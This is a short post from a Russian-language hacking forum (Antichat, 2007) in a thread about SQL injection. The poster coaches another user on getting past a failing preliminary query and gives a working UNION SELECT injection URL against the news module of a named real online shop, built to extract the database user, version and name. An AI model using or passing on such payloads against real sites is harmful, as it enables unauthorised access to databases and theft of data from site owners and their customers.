Тема: Скуль
Показать сообщение отдельно

  #2  
Старый 13.10.2007, 15:42
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

У тебя заруб идёт на предварительном запрос, не на том, который выводится. Если бы ты был упорнее, ты бы нашёл модуль, где нету никаких предварительных запросов, ака "посчитать количество чего-либо" или "взять имя чего-то где модуль=чему-то". Например в модуле news есть SQL-Injection с выводом:

Цитата:
http://www.acasashop.md/?module=news&cmd=view&id=-16'+UNION+SELECT+1,2,3,CONCAT_WS(0x3a,USER(),VERSI ON(),DATABASE()),5,6/*